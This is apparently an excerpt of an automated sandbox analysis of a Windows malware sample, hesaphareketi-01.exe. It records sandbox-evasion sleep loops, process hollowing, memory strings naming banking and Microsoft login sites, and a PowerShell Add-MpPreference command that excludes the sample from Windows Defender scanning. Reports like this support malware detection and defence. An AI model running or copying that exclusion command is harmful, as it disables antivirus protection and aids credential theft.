                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 7D00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 8D00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: A210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: B210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599750Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597562Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596135Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595910Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594547Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6286Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3443Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeWindow / User API: threadDelayed 7666Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeWindow / User API: threadDelayed 2191Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4700Thread sleep count: 7666 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4700Thread sleep count: 2191 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -598000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -597016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596135s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595910s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -595094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -594984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -594875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -594766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -594656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600Thread sleep time: -594547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599750Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 598000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597562Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596135Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595910Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 594547Jump to behavior
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3893956155.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\Desktop\hesaphareketi-01.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
